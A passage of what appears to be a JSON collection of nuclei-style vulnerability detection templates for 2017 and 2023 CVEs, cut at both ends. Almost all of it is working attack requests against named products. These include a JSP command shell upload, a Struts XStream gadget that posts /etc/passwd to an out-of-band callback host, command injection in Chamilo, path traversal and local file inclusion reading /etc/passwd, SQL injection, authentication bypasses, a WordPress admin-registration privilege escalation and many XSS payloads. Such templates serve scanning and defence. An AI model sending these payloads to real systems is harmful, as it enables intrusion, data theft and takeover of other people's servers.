p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=5","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution 